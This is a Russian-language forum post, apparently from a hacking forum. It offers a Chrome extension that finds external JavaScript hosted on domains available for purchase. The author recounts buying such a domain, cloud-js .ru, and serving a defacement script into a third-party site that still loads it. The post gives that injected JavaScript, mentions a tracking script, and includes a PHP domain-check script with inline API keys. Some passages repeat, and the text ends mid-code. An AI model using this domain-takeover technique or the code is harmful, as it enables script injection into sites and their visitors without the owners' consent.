Пожалуйста, обратите внимание, что пользователь заблокирован
============
=============
==============
==========
Более того, данное расширение также производит анализ доменов, на которых расположены скрипты, с использованием API GoDaddy, чтобы определить их доступность для покупки. Если домен доступен для приобретения, расширение уведомляет вас об этой возможности.
Для чего нужно расширение?
Предположим, вы - администратор сайта, разместили внешний JavaScript на своем веб-сайте, будь то статистика посещений, виджет, чат или любой другой функциональный элемент. С течением времени владелец домена, на котором размещен этот скрипт, забывает продлить его. Вы, возможно, не замечаете, что ваш виджет.js или чат.js перестает работать, и на вашем сайте появляется ссылка на скрипт, домен которого сейчас продается.
И вот здесь на помощь приходит данное расширение. Оно сканирует внешние JavaScript-файлы во время серфинга в фоновом режиме и проверяет доступность домена на котором они расположены для покупки. Если расширение обнаружит такой скрипт на одной из посещенных вами страниц, оно оповестит вас.
Пример
Как установить расширение?
Скачать расширение (onion)
Решил пошарить по сайтам, запрос был "SAMP моды". Спустя немного времени, попал на чей-то старинный дор http://pogonina.com/?onf=skachat-server-mod-dlya-samp (который видимо сделали под загрузки, так еще и под СНГ - такое мы осуждаем). Расширение отработало и показало, что на сайте имеется ссылка на 2 JS-скрипта, которые расположены на домене cloud-js точка ru
Посмотрел сколько он стоит...
Решил купить, сделать дефейс этого *** для примера. Да и вообще посмотреть, быть может на него и другие cтаринные доры ссылаются еще.
Разместил на cloud-js точка ru/images/ajax2.js
Такой код:
Скрипт просто подождет пока загрузится страничка, удалит блок с контентом дора и разместит надпись "xss.pro | Не забыйте о внешних javascript'ах"
Что получилось:
На cloud-js точка ru/images/ajax1.js разместил скрипт через который буду получить информацию на каких еще страницах установленн данный скрипт.
Потом перешёл на главную страницу. Это сайт про какую-то шахматистку, который взломали и разместили на нем дорвей.
На сайте кстати тоже есть внешние, забытые JS (домен правда не купить)
====
Посмотрел сколько он стоит...
Разместил на cloud-js точка ru/images/ajax2.js
Такой код:
Код:
window.addEventListener('load', function() {
if(document.getElementById("baviku")){
var htmlToInsert = "<div><h1 style='color:white;margin-top:300px;'>xss.pro</h1></div><div style='color:white;'>Не забывайте о внешних javascript'ах</div>";
document.getElementById("baviku").insertAdjacentHTML('beforebegin', htmlToInsert);
document.getElementById("baviku").remove();
}
});
Что получилось:
Потом перешёл на главную страницу. Это сайт про какую-то шахматистку, который взломали и разместили на нем дорвей.
На сайте кстати тоже есть внешние, забытые JS (домен правда не купить)
1.Открываем Google Chrome, вставляем в адресную строку "chrome://extensions/" (Без кавычек) и переходим
2. Прожимаем кнопку "Load unpacked" или "Загрузить распакованное расширение" и указываем папку с распакованным архивом (Ссылка на архив с расширением будет внизу). Если все сделаете правильно, появится наше расширение (скрин ниже под спойлером).
3. В правом углу экрана выбираете расширение, настраиваете как вам удобно.
4. Для тех, кто не хочет проверять домены (можно купить домен или нет?) на моем сервере - отжимаете галочку "Проверять доступность домена для покупки с помощью сервера создателя" в настройках.
Кто хочет проверять на моем сервере, предупреждаю - я буду сохранять ссылки, которые будут приходить ко мне на сервер. Если сервер вдруг ляжет или его заблокируют, ответы вам идти не будут и ссылки проверяться тоже (просто предупреждаю, учитывайте это). Советую вам отжать галочку и поставить cкрипт к себе на хостинг, проверять с помощью своего скрипта, но это не обязательно - через мой тоже будет работать какое-то время (потыкать, посмотреть как работает расширение, думаю вам хватит)
Такое будет описание, если нажмете на ссылку "[Где взять скрипт проверки]"
Не забудьте заменить на свои API ключи
ping.php
3. В правом углу экрана выбираете расширение, настраиваете как вам удобно.
Кто хочет проверять на моем сервере, предупреждаю - я буду сохранять ссылки, которые будут приходить ко мне на сервер. Если сервер вдруг ляжет или его заблокируют, ответы вам идти не будут и ссылки проверяться тоже (просто предупреждаю, учитывайте это). Советую вам отжать галочку и поставить cкрипт к себе на хостинг, проверять с помощью своего скрипта, но это не обязательно - через мой тоже будет работать какое-то время (потыкать, посмотреть как работает расширение, думаю вам хватит)
Такое будет описание, если нажмете на ссылку "[Где взять скрипт проверки]"
PHP:
$apiKey = "gGrgXqQquG3u_XnAqfboqKEkwoXkwofwB27"; // Замените на ваш ключ API
$apiSecret = "NxssddlfiGwxxXeigjoGiegyik"; // Замените на ваш секретный код API
PHP:
<?php
header('Access-Control-Allow-Origin: *');
header("Content-Security-Policy: default-src 'self' *;");
function isLinkAvailable($url) {
$headers = @get_headers($url);
return $headers && (strpos($headers[0], '200') !== false || strpos($headers[0], '30') === 0);
}
function getDomainFromUrl($url) {
$urlParts = parse_url($url);
if (isset($urlParts['host'])) {
return $urlParts['host'];
}
return null;
}
if ($_SERVER["REQUEST_METHOD"] === "POST") {
if (isset($_POST["linkjs"]) && isset($_POST["link"])) {
$linkjs = $_POST["linkjs"];
$link = $_POST["link"];
if (isLinkAvailable($linkjs)) {
echo "Ссылка доступна.";
} else {
echo "Ссылка недоступна. | Шаг 1";
$domain = getDomainFromUrl($linkjs);
$checkType = "FULL"; // Выберите 'FAST' или 'FULL'
$forTransfer = false; // Выберите true или false
$baseURL = "https://api.godaddy.com"; // URL для продукционного окружения
// $baseURL = "https://api.ote-godaddy.com"; // URL для тестового окружения
$url = "$baseURL/v1/domains/available?domain=$domain&checkType=$checkType&forTransfer=$forTransfer";
$apiKey = "gGrgXqQquG3u_XnAqfboqKEkwoXkwofwB27"; // Замените на ваш ключ API
$apiSecret = "NxssddlfiGwxxXeigjoGiegyik"; // Замените на ваш секретный код API
$headers = array(
"Authorization: sso-key $apiKey:$apiSecret"
);
$curl = curl_init();
curl_setopt_array($curl, array(
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HTTPHEADER => $headers,
));
$response = curl_exec($curl);